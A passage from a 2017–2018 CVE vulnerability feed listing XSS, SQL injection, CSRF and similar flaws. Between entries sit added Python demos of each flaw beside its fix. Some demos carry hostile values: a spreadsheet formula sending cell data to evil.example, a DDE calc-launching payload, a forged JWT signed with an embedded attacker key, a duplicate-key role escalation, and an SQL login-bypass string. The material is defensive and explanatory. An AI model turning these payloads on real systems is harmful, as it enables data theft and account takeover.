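The origin check alone is not enough in every deployment (some clients strip Referer and old browsers omit Origin), and the token alone does not help if it leaks through a reflected XSS, which is why the two are combined here; a cookie attribute of SameSite=Lax or Strict on the session cookie adds a third, browser-enforced layer.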
CVE-2017-17999 7.5
SQL injection vulnerability in RISE Ultimate Project Manager 1.9 allows remote attackers to execute arbitrary SQL commands via the search parameter to index.php/knowledge_base/get_article_suggestion/.
23-01-2018 - 13:29 23-01-2018 - 13:29
CVE-2017-18049 4.3
In the CSV export feature of SilverStripe before 3.5.6, 3.6.x before 3.6.3, and 4.x before 4.0.1, it's possible for the output to contain macros and scripts, which may be executed if imported without sanitization into common software (including Micro
23-01-2018 - 01:29 23-01-2018 - 01:29
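The SilverStripe entry above is a CSV formula-injection issue: text that begins with a formula trigger character is executed, not displayed, when the export is opened in a spreadsheet. The following is an added example, not SilverStripe code, of an exporter that neutralises such cells before writing them. The trigger list follows the usual guidance for this bug class (equals, plus, minus, at-sign, tab and carriage return), the rows and payloads are constructed, and leaving non-string values untouched so that real negative numbers survive is a design choice of this example.

```python
import csv
import io

# Leading characters that make a spreadsheet treat a cell as a formula or a
# DDE command. The check runs after leading whitespace is stripped because
# the importing application strips it too.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Prefix a formula-looking text cell with a single quote so the importing
    spreadsheet renders it as text. Non-string values (real numbers, None) are
    returned unchanged so legitimate negatives are not mangled."""
    if isinstance(value, str) and value.lstrip(" \t\r\n").startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_csv(rows) -> str:
    """Write rows as CSV with every field quoted. Quoting keeps a crafted field
    from spilling into neighbouring columns; neutralize_cell keeps it from
    executing once the file is opened."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed rows: the second and third contain formula-injection payloads of
# the kind that reach an export when users control the exported field.
SAMPLE_ROWS = [
    ["member", "comment", "score"],
    ["alice", "=HYPERLINK(\"http://evil.example/?\"&A1,\"click me\")", -3],
    ["bob", "=cmd|' /C calc'!A0", 7],
    ["carol", "nothing to see here", 0],
]


if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS), end="")
```

The single-quote prefix is visible to the recipient, which is the accepted trade-off; the alternative of stripping the trigger character silently alters user data. Text fields that legitimately start with a minus or plus sign (phone numbers, bullet-style notes) are also prefixed, which is why numeric columns should be exported as numbers rather than pre-formatted strings.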
CVE-2018-2636 6.8
Vulnerability in the Oracle Hospitality Simphony component of Oracle Hospitality Applications (subcomponent: Security). Supported versions that are affected are 2.7, 2.8 and 2.9. Difficult to exploit vulnerability allows unauthenticated attacker with
17-01-2018 - 21:29 17-01-2018 - 21:29
CVE-2017-10273 3.7
Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. Difficult to exploit vulnerab
17-01-2018 - 21:29 17-01-2018 - 21:29
CVE-2018-5715 4.3
phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable).
16-01-2018 - 15:29 16-01-2018 - 15:29
CVE-2018-5370 4.3
BizLogic xnami 1.0 has XSS via the comment parameter in an addComment action to the /media/ajax URI.
16-01-2018 - 14:29 16-01-2018 - 14:29
CVE-2018-5479 4.3
FoxSash ImgHosting 1.5 (according to footer information) is vulnerable to XSS attacks. The affected function is its search engine via the search parameter to the default URI. Since there is a user/admin login interface, it's possible for attackers t
15-01-2018 - 11:29 15-01-2018 - 11:29
CVE-2018-5688 4.3
ILIAS before 5.2.4 has XSS via the cmd parameter to the displayHeader function in setup/classes/class.ilSetupGUI.php in the Setup component.
14-01-2018 - 15:29 14-01-2018 - 15:29
CVE-2018-5315 7.5
The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection via the event_id parameter to event.php.
12-01-2018 - 12:29 12-01-2018 - 12:29
CVE-2017-17970 7.5
Multiple SQL injection vulnerabilities in Muviko 1.1 allow remote attackers to execute arbitrary SQL commands via the (1) email parameter to login.php; the (2) season_id parameter to themes/flixer/ajax/load_season.php; the (3) movie_id parameter to t
12-01-2018 - 12:29 12-01-2018 - 12:29
CVE-2017-16887 5.0
The portal on FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP-based web services to interact with the portal. Unauthorized access to the web services can result in disclosure of the WLAN key/password.
12-01-2018 - 12:29 12-01-2018 - 12:29
CVE-2017-16886 6.8
The portal on FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP-based web services to interact with the portal. Unauthorized access to the web services via CSRF can result in an unauthorized change of username or password of the
12-01-2018 - 12:29 12-01-2018 - 12:29
CVE-2017-16885 5.0
Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The
12-01-2018 - 12:29 12-01-2018 - 12:29
CVE-2012-0699 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Family Connections CMS (aka FCMS) 2.9 and earlier allow remote attackers to hijack the authentication of arbitrary users for requests that (1) add news via an add action to familynews.php
11-01-2018 - 15:29 11-01-2018 - 15:29
CVE-2012-6667 4.3
Cross-site scripting (XSS) vulnerability in vbshout.php in DragonByte Technologies vBShout module for vBulletin allows remote attackers to inject arbitrary web script or HTML via the shout parameter in a shout action.
11-01-2018 - 11:29 11-01-2018 - 11:29
CVE-2018-5211 7.5
PHP Melody version 2.7.1 suffers from a time-based SQL injection on the page ajax.php via the playlist parameter.
09-01-2018 - 11:29 09-01-2018 - 11:29
CVE-2018-5263 3.5
The StackIdeas EasyDiscuss (aka com_easydiscuss) extension before 4.0.21 for Joomla! allows XSS.
08-01-2018 - 18:29 08-01-2018 - 18:29
CVE-2017-7997 7.5
Multiple SQL injection vulnerabilities in Gespage before 7.4.9 allow remote attackers to execute arbitrary SQL commands via the (1) show_prn parameter to webapp/users/prnow.jsp or show_month parameter to (2) webapp/users/blhistory.jsp or (3) webapp/u
08-01-2018 - 14:29 08-01-2018 - 14:29
CVE-2017-16720 5.0
A Path Traversal issue was discovered in WebAccess versions prior to 8.3. An attacker has access to files within the directory structure of the target device.
05-01-2018 - 03:29 05-01-2018 - 03:29
CVE-2017-16716 7.5
A SQL Injection issue was discovered in WebAccess versions prior to 8.3. WebAccess does not properly sanitize its inputs for SQL commands.
05-01-2018 - 03:29 05-01-2018 - 03:29
CVE-2017-14960 5.0
xDashboard in OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) v4.5SP1 Patch 13 has SQL Injection.
04-01-2018 - 12:29 04-01-2018 - 12:29
CVE-2018-0114 5.0
A vulnerability in the Cisco node-jose open source library before 0.11.0 could allow an unauthenticated, remote attacker to re-sign tokens using a key that is embedded within the token. The vulnerability is due to node-jose following the JSON Web Sig
04-01-2018 - 01:29 04-01-2018 - 01:29
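The node-jose entry above describes a verifier that accepts key material carried inside the token it is checking, so whoever writes the header also picks the key that "validates" it. The following is an added example, not node-jose code, that reproduces the logic flaw with a minimal compact-JWS implementation and shows the hardened verifier beside it. HS256 with an embedded symmetric ("oct") JWK is used here because it needs only the standard library; the same trust error applies to asymmetric keys embedded in the header. The server key, attacker key and claims are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed for the example: the only key the verifier should ever trust.
SERVER_KEY = b"issuer-side-hmac-key-never-sent-to-clients"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign(payload: dict, key: bytes, extra_header: Optional[dict] = None) -> str:
    """Produce a compact JWS (HS256) over `payload`; `extra_header` is how the
    attacker side smuggles a 'jwk' member into the protected header."""
    header = {"alg": "HS256", "typ": "JWT", **(extra_header or {})}
    h = _b64url(json.dumps(header, separators=(",", ":")).encode())
    p = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{_b64url(sig)}"


def _parts(token: str):
    h, p, s = token.split(".")
    return json.loads(_b64url_decode(h)), h, p, _b64url_decode(s)


def _check(h: str, p: str, sig: bytes, key: bytes) -> Optional[dict]:
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return json.loads(_b64url_decode(p)) if hmac.compare_digest(sig, expected) else None


def verify_vulnerable(token: str) -> Optional[dict]:
    """Flaw: a 'jwk' member in the header is used as the verification key."""
    header, h, p, sig = _parts(token)
    key = SERVER_KEY
    jwk = header.get("jwk")
    if isinstance(jwk, dict) and jwk.get("kty") == "oct" and "k" in jwk:
        key = _b64url_decode(jwk["k"])
    return _check(h, p, sig, key)


def verify_hardened(token: str) -> Optional[dict]:
    """Pin the algorithm, refuse any header that names its own key material
    ('jwk', 'jku', 'x5c', 'x5u'), and verify only with the server-side key."""
    header, h, p, sig = _parts(token)
    if header.get("alg") != "HS256":
        return None
    if any(name in header for name in ("jwk", "jku", "x5c", "x5u")):
        return None
    return _check(h, p, sig, SERVER_KEY)


def forge(payload: dict) -> str:
    """Attacker side: choose a key, embed it as a JWK in the header, sign with
    it. No knowledge of SERVER_KEY is required."""
    attacker_key = b"attacker-chosen-key"
    jwk = {"kty": "oct", "k": _b64url(attacker_key)}
    return sign(payload, attacker_key, {"jwk": jwk})


if __name__ == "__main__":
    forged = forge({"sub": "alice", "admin": True})
    print("vulnerable verifier:", verify_vulnerable(forged))
    print("hardened verifier  :", verify_hardened(forged))
```

A legitimately issued token passes both verifiers; the forged token, whose header carries the attacker's own key, is accepted as valid by the vulnerable one and rejected by the hardened one. Rejecting rather than ignoring the key-bearing header members is deliberate: a genuine issuer in this deployment never sets them, so their presence is itself a signal of tampering.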
CVE-2017-8046 7.5
Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java co
04-01-2018 - 01:29 04-01-2018 - 01:29
CVE-2017-1000486 7.5
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.
03-01-2018 - 15:29 03-01-2018 - 15:29
CVE-2017-1000432 6.0
Vanilla Forums before 2.1.5 is affected by CSRF leading to deletion of topics and comments from forums via admin access.
02-01-2018 - 18:29 02-01-2018 - 18:29
CVE-2017-17098 7.5
The writeLog function in fn_common.php in gps-server.net GPS Tracking Software (self hosted) through 3.0 allows remote attackers to inject arbitrary PHP code via a crafted request that is mishandled during admin log viewing, as demonstrated by <?php
02-01-2018 - 10:29 02-01-2018 - 10:29
CVE-2017-17097 5.0
gps-server.net GPS Tracking Software (self hosted) 2.x has a password reset procedure that immediately resets passwords upon an unauthenticated request, and then sends e-mail with a predictable (date-based) password to the admin, which makes it easie
02-01-2018 - 10:29 02-01-2018 - 10:29
CVE-2018-3811 7.5
SQL Injection vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to execute SQL queries in the context of the web server. The saveGoogleAdWords() function in smartgooglecode.php did
01-01-2018 - 01:29 01-01-2018 - 01:29
CVE-2018-3810 7.5
Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages ser
01-01-2018 - 01:29 01-01-2018 - 01:29
CVE-2015-3302 5.0
The TheCartPress eCommerce Shopping Cart (aka The Professional WordPress eCommerce Plugin) plugin for WordPress before 1.3.9.3 allows remote attackers to obtain sensitive order detail information by leveraging a "broken authentication mechanism."
29-12-2017 - 17:29 29-12-2017 - 17:29
CVE-2017-17876 5.0
Biometric Shift Employee Management System 3.0 allows remote attackers to bypass intended file-read restrictions via a user=download request with a pathname in the path parameter.
27-12-2017 - 12:08 27-12-2017 - 12:08
CVE-2017-17875 7.5
The JEXTN FAQ Pro extension 4.0.0 for Joomla! has SQL Injection via the id parameter in a view=category action.
27-12-2017 - 12:08 27-12-2017 - 12:08
CVE-2017-17411 10.0
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Linksys WVBR0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issu
21-12-2017 - 09:29 21-12-2017 - 09:29
CVE-2017-17752 4.3
Ability Mail Server 3.3.2 has Cross Site Scripting (XSS) via the body of an e-mail message, with JavaScript code executed on the Read Mail screen (aka the /_readmail URI). This is fixed in version 4.2.4.
20-12-2017 - 11:29 20-12-2017 - 11:29
CVE-2017-17759 10.0
Conarc iChannel allows remote attackers to obtain sensitive information, modify the configuration, or cause a denial of service (by deleting the configuration) via a wc.dll?wwMaint~EditConfig request (which reaches an older version of a West Wind Web
19-12-2017 - 02:29 19-12-2017 - 02:29
CVE-2017-16949 7.5
An issue was discovered in the AccessKeys AccessPress Anonymous Post Pro plugin through 3.1.9 for WordPress. Improper input sanitization allows the attacker to override the settings for allowed file extensions and upload file size, related to inc/cor
18-12-2017 - 21:29 18-12-2017 - 21:29
CVE-2017-17721 7.5
CWEBNET/WOSummary/List in ZUUSE BEIMS ContractorWeb .NET 5.18.0.0 allows SQL injection via the tradestatus, assetno, assignto, building, domain, jobtype, site, trade, woType, workorderno, or workorderstatus parameter.
18-12-2017 - 11:29 18-12-2017 - 11:29
CVE-2017-17649 4.3
Readymade Video Sharing Script 3.2 has HTML Injection via the single-video-detail.php comment parameter.
18-12-2017 - 04:29 18-12-2017 - 04:29
CVE-2017-17645 7.5
Bus Booking Script 1.0 has SQL Injection via the txtname parameter to admin/index.php.
18-12-2017 - 04:29 18-12-2017 - 04:29
CVE-2017-17643 7.5
FS Lynda Clone 1.0 has SQL Injection via the keywords parameter to tutorial/.
18-12-2017 - 04:29 18-12-2017 - 04:29
CVE-2017-17739 7.5
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) has directory traversal via the /storage.html rp parameter, allowing an attacker to read or write to files.
18-12-2017 - 01:29 18-12-2017 - 01:29
CVE-2017-17738 6.4
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) allows renaming and modifying files via /tools.html.
18-12-2017 - 01:29 18-12-2017 - 01:29
CVE-2017-17737 4.3
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) has XSS via the REF parameter to /network_diagnostics.html or /storage_info.html.
18-12-2017 - 01:29 18-12-2017 - 01:29
CVE-2017-16787 4.0
The Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote attackers to read arbitrary files by leveraging failure to restrict URL access.
15-12-2017 - 13:29 15-12-2017 - 13:29
CVE-2017-5264 6.8
Versions of Nexpose prior to 6.4.66 fail to adequately validate the source of HTTP requests intended for the Automated Actions administrative web application, and are susceptible to a cross-site request forgery (CSRF) attack.
14-12-2017 - 16:29 14-12-2017 - 16:29
CVE-2017-17672 7.5
In vBulletin through 5.3.x, there is an unauthenticated deserialization vulnerability that leads to arbitrary file deletion and, under certain circumstances, code execution, because of unsafe usage of PHP's unserialize() in vB_Library_Template's cach
13-12-2017 - 19:29 13-12-2017 - 19:29
CVE-2017-17111 7.5
Posty Readymade Classifieds Script 1.0 allows an attacker to inject SQL commands via a listings.php?catid= or ads-details.php?ID= request.
11-12-2017 - 12:29 11-12-2017 - 12:29
CVE-2017-17110 7.5
Techno Portfolio Management Panel 1.0 allows an attacker to inject SQL commands via a single.php?id= request.
11-12-2017 - 12:29 11-12-2017 - 12:29
CVE-2017-11319 6.5
Perspective ICM Investigation & Case 5.1.1.16 allows remote authenticated users to modify access level permissions and consequently gain privileges by leveraging insufficient validation and missing server-side cross-checks.
11-12-2017 - 12:29 11-12-2017 - 12:29
CVE-2017-16921 9.0
In OTRS 6.0.x up to and including 6.0.1, OTRS 5.0.x up to and including 5.0.24, and OTRS 4.0.x up to and including 4.0.26, an attacker who is logged into OTRS as an agent can manipulate form parameters (related to PGP) and execute arbitrary shell com
08-12-2017 - 10:29 08-12-2017 - 10:29
CVE-2017-17055 8.5
Artica Web Proxy before 3.06.112911 allows remote attackers to execute arbitrary code as root by conducting a cross-site scripting (XSS) attack involving the username-form-id parameter to freeradius.users.php.
06-12-2017 - 21:29 06-12-2017 - 21:29
CVE-2017-16884 4.3
Cross-site scripting (XSS) vulnerability in MistServer before 2.13 allows remote attackers to inject arbitrary web script or HTML via vectors related to failed authentication requests alerts.
06-12-2017 - 21:29 06-12-2017 - 21:29
CVE-2017-16953 5.0
connoppp.cgi on ZTE ZXDSL 831CII devices does not require HTTP Basic Authentication, which allows remote attackers to modify the PPPoE configuration or set up a malicious configuration via a GET request.
01-12-2017 - 12:29 01-12-2017 - 12:29
CVE-2017-17058 5.0
** DISPUTED ** The WooCommerce plugin through 3.x for WordPress has a Directory Traversal Vulnerability via a /wp-content/plugins/woocommerce/templates/emails/plain/ URI, which accesses a parent directory. NOTE: a software maintainer indicates that D
29-11-2017 - 02:29 29-11-2017 - 02:29
CVE-2016-6024 4.0
IBM Jazz technology-based products might divulge information through error messages that could be useful to attackers. IBM X-Force ID: 116868.
27-11-2017 - 16:29 27-11-2017 - 16:29
CVE-2017-16843 3.5
Vonage VDV-23 115 3.2.11-0.9.40 devices have stored XSS via the NewKeyword or NewDomain field to /goform/RgParentalBasic.
16-11-2017 - 16:29 16-11-2017 - 16:29
CVE-2017-16841 4.3
LanSweeper 6.0.100.75 has XSS via the description parameter to /Calendar/CalendarActions.aspx.
15-11-2017 - 22:29 15-11-2017 - 22:29
CVE-2017-15806 6.8
The send function in the ezcMailMtaTransport class in Zeta Components Mail before 1.8.2 does not properly restrict the set of characters used in the ezcMail returnPath property, which might allow remote attackers to execute arbitrary code via a craft
15-11-2017 - 11:29 15-11-2017 - 11:29
CVE-2017-12636 9.0
CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB bef
14-11-2017 - 15:29 14-11-2017 - 15:29
CVE-2017-12635 10.0
Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the data
14-11-2017 - 15:29 14-11-2017 - 15:29
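The CouchDB entry above (CVE-2017-12635) describes a parser differential: two JSON parsers disagree on which value a repeated key has, so the component that validates a document and the component that stores it see different 'roles'. The Python below is an added illustration, not CouchDB code; the first-wins parser, the self-registration rule and the payload are constructed for the demo, and which side keeps the first value versus the last is an assumption that does not change the lesson.

```python
import json


def parse_last_wins(text):
    """json.loads default: when a key repeats, the LAST value is kept."""
    return json.loads(text)


def parse_first_wins(text):
    """Constructed stand-in for a parser that keeps the FIRST value of a
    repeated key (an assumption for the demo, not CouchDB's actual code)."""
    def keep_first(pairs):
        out = {}
        for key, value in pairs:
            out.setdefault(key, value)
        return out
    return json.loads(text, object_pairs_hook=keep_first)


def parse_strict(text):
    """Hardened: refuse any object that repeats a key, so every component
    downstream sees the same document or none at all."""
    def reject_dupes(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen:
                raise ValueError("duplicate key: %r" % key)
            seen.add(key)
        return dict(pairs)
    return json.loads(text, object_pairs_hook=reject_dupes)


def admit_new_user(text, validator_parse, storage_parse):
    """Self-registration rule: a new user may not claim any roles.
    The validator and the storage layer each parse the raw text with
    their own parser; returns the roles the storage layer ends up with."""
    doc = validator_parse(text)
    if doc.get("roles"):
        raise PermissionError("self-registered users may not set roles")
    return storage_parse(text).get("roles", [])


# Constructed payload: the privileged value first, an innocent duplicate last.
PAYLOAD = '{"name": "mallory", "password": "x", "roles": ["_admin"], "roles": []}'


def demo():
    # Validator keeps the last value ([]), storage keeps the first (["_admin"]).
    escalated = admit_new_user(PAYLOAD, parse_last_wins, parse_first_wins)
    # Same parser on both sides: no disagreement, no escalation.
    consistent = admit_new_user(PAYLOAD, parse_last_wins, parse_last_wins)
    # Strict parser: the document is rejected before any rule is evaluated.
    try:
        admit_new_user(PAYLOAD, parse_strict, parse_strict)
        rejected = False
    except ValueError:
        rejected = True
    return escalated, consistent, rejected


if __name__ == "__main__":
    print(demo())
```

The check a practitioner wants here is the strict parser: rejecting duplicate keys at the boundary removes the differential entirely, instead of hoping every parser in the pipeline picks the same value.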
CVE-2017-16807 3.5
A cross-site Scripting (XSS) vulnerability in Kirby Panel before 2.3.3, 2.4.x before 2.4.2, and 2.5.x before 2.5.7 exists when displaying a specially prepared SVG document that has been uploaded as a content file.
13-11-2017 - 16:29 13-11-2017 - 16:29
CVE-2017-16568 3.5
Cross-site scripting (XSS) vulnerability in Logitech Media Server 7.9.0 allows remote attackers to inject arbitrary web script or HTML via a radio URL.
09-11-2017 - 21:29 09-11-2017 - 21:29
CVE-2017-16567 3.5
Cross-site scripting (XSS) vulnerability in Logitech Media Server 7.9.0 allows remote attackers to inject arbitrary web script or HTML via a "favorite."
09-11-2017 - 21:29 09-11-2017 - 21:29
CVE-2015-3933 7.5
Multiple SQL injection vulnerabilities in inc/lib/User.class.php in MetalGenix GeniXCMS before 0.0.3-patch allow remote attackers to execute arbitrary SQL commands via the (1) email parameter or (2) userid parameter to register.php.
08-11-2017 - 11:29 08-11-2017 - 11:29
CVE-2017-14016 6.8
A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. The application lacks proper validation of the length of user-supplied data prior to copying it to a stack-based buffer, which could allow an a
06-11-2017 - 17:29 06-11-2017 - 17:29
CVE-2017-16570 6.8
KeystoneJS before 4.0.0-beta.7 allows application-wide CSRF bypass by removing the CSRF parameter and value, aka SecureLayer7 issue number SL7_KEYJS_03. In other words, it fails to reject requests that lack an x-csrf-token header.
06-11-2017 - 03:29 06-11-2017 - 03:29
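The KeystoneJS entry above (CVE-2017-16570) names a common CSRF defect: the token is validated only when the request carries one, so omitting the parameter or header skips the check. The Python below is an added example, not KeystoneJS code; the header name, the `handle` dispatcher and the `_header` helper are constructed for the demo.

```python
import hmac
import secrets


def issue_csrf_token():
    """Per-session secret the server stores and the page echoes into the form or header."""
    return secrets.token_hex(16)


def _header(headers, name):
    """Case-insensitive header lookup (constructed helper; frameworks do this for you)."""
    name = name.lower()
    for key, value in headers.items():
        if key.lower() == name:
            return value
    return None


def csrf_ok_vulnerable(session_token, headers):
    """The defect described above: the token is compared only when the
    client sent one. A forged request simply omits it and passes."""
    sent = _header(headers, "x-csrf-token")
    if sent is not None and not hmac.compare_digest(sent.encode(), session_token.encode()):
        return False
    return True


def csrf_ok_fixed(session_token, headers):
    """A missing token is a failed check, not a skipped one."""
    sent = _header(headers, "x-csrf-token")
    if not session_token or sent is None:
        return False
    return hmac.compare_digest(sent.encode(), session_token.encode())


UNSAFE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def handle(method, headers, session_token, check):
    """Apply `check` to state-changing requests only; returns an HTTP status code."""
    if method.upper() in UNSAFE_METHODS and not check(session_token, headers):
        return 403
    return 200


if __name__ == "__main__":
    tok = issue_csrf_token()
    print("forged POST, vulnerable check:", handle("POST", {}, tok, csrf_ok_vulnerable))
    print("forged POST, fixed check:", handle("POST", {}, tok, csrf_ok_fixed))
```

The comparison is constant-time and keyed to the session; the part that matters for this CVE is the `sent is None` branch, which must fail closed.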
CVE-2017-16524 6.5
Web Viewer 1.0.0.193 on Samsung SRN-1670D devices suffers from an Unrestricted file upload vulnerability: 'network_ssl_upload.php' allows remote authenticated attackers to upload and execute arbitrary PHP code via a filename with a .php extension, wh
06-11-2017 - 03:29 06-11-2017 - 03:29
CVE-2017-16543 7.5
Zoho ManageEngine Applications Manager 13 before build 13500 allows SQL injection via GraphicalView.do, as demonstrated by a crafted viewProps yCanvas field or viewid parameter.
05-11-2017 - 12:29 05-11-2017 - 12:29
CVE-2017-16542 6.5
Zoho ManageEngine Applications Manager 13 before build 13500 allows Post-authentication SQL injection via the name parameter in a manageApplications.do?method=insert request.
05-11-2017 - 12:29 05-11-2017 - 12:29
CVE-2017-16244 6.8
Cross-Site Request Forgery exists in OctoberCMS 1.0.426 (aka Build 426) due to improper validation of CSRF tokens for postback handling, allowing an attacker to successfully take over the victim's account. The attack bypasses a protection mechanism i
31-10-2017 - 21:29 31-10-2017 - 21:29
CVE-2017-15993 7.5
Zomato Clone Script allows SQL Injection via the restaurant-menu.php resid parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15992 7.5
Website Broker Script allows SQL Injection via the 'status_id' Parameter to status_list.php.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15991 7.5
Vastal I-Tech Agent Zone (aka The Real Estate Script) allows SQL Injection in searchCommercial.php via the property_type, city, or posted_by parameter, or searchResidential.php via the property_type, city, or bedroom parameter, a different vulnerabil
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15990 7.5
Php Inventory & Invoice Management System allows Arbitrary File Upload via dashboard/edit_myaccountdetail/.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15989 7.5
Online Exam Test Application allows SQL Injection via the resources.php sort parameter in a category action.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15988 7.5
Nice PHP FAQ Script allows SQL Injection via the index.php nice_theme parameter, a different vulnerability than CVE-2008-6525.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15987 7.5
Fake Magazine Cover Script allows SQL Injection via the rate.php value parameter or the content.php id parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15986 7.5
CPA Lead Reward Script allows SQL Injection via the username parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15985 7.5
Basic B2B Script allows SQL Injection via the product_view1.php pid or id parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15984 7.5
Creative Management System (CMS) Lite 1.4 allows SQL Injection via the S parameter to index.php.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15983 7.5
MyMagazine Magazine & Blog CMS 1.0 allows SQL Injection via the id parameter to admin/admin_process.php for form editing.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15982 7.5
Dynamic News Magazine & Blog CMS 1.0 allows SQL Injection via the id parameter to admin/admin_process.php for form editing.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15981 7.5
Responsive Newspaper Magazine & Blog CMS 1.0 allows SQL Injection via the id parameter to admin/admin_process.php for form editing.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15980 7.5
US Zip Codes Database Script 1.0 allows SQL Injection via the state parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15979 7.5
Shareet - Photo Sharing Social Network 1.0 allows SQL Injection via the photo parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15978 7.5
AROX School ERP PHP Script 1.0 allows SQL Injection via the office_admin/ id parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15977 7.5
Protected Links - Expiring Download Links 1.0 allows SQL Injection via the username parameter.
31-10-2017 - 03:29 31-10-2017 - 03:29
CVE-2017-15976 7.5
ZeeBuddy 2x allows SQL Injection via the admin/editadgroup.php groupid parameter, a different vulnerability than CVE-2008-3604.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15975 7.5
Vastal I-Tech Dating Zone 0.9.9 allows SQL Injection via the 'product_id' to add_to_cart.php, a different vulnerability than CVE-2008-4461.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15974 7.5
tPanel 2009 allows SQL injection for Authentication Bypass via 'or 1=1 or ''=' to login.php.
29-10-2017 - 02:29 29-10-2017 - 02:29
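The tPanel entry above (CVE-2017-15974) quotes the payload `'or 1=1 or ''='`. The Python/sqlite3 snippet below is an added example, not tPanel code: it builds the kind of string-concatenated login query such a payload defeats, shows the tautology it produces, and the parameterised form that treats the same input as data. The table, credentials and function names are constructed.

```python
import sqlite3

# Payload quoted verbatim in the tPanel entry; here it is sent as the password.
PAYLOAD = "'or 1=1 or ''='"


def make_db():
    """Constructed in-memory user table (plaintext password only to keep the demo short)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'c0rrect-h0rse')")
    return db


def rendered_query(username, password):
    """The text the vulnerable function actually hands to the database."""
    return "SELECT username FROM users WHERE username='%s' AND password='%s'" % (username, password)


def login_vulnerable(db, username, password):
    """String-built query: the payload closes the literal and appends
    or 1=1 or ''='' so the WHERE clause is true for every row."""
    row = db.execute(rendered_query(username, password)).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Parameterised query: the payload is compared as a value, never parsed as SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    db = make_db()
    return {
        "vulnerable": login_vulnerable(db, "nobody", PAYLOAD),
        "fixed": login_fixed(db, "nobody", PAYLOAD),
        "legit": login_fixed(db, "admin", "c0rrect-h0rse"),
    }


if __name__ == "__main__":
    print(rendered_query("nobody", PAYLOAD))
    print(demo())
```

The rendered WHERE clause ends in `password=''or 1=1 or ''=''`; because AND binds tighter than OR, the whole predicate is true and the first row (here the admin) is returned.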
CVE-2017-15973 7.5
Sokial Social Network Script 1.0 allows SQL Injection via the id parameter to admin/members_view.php.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15972 7.5
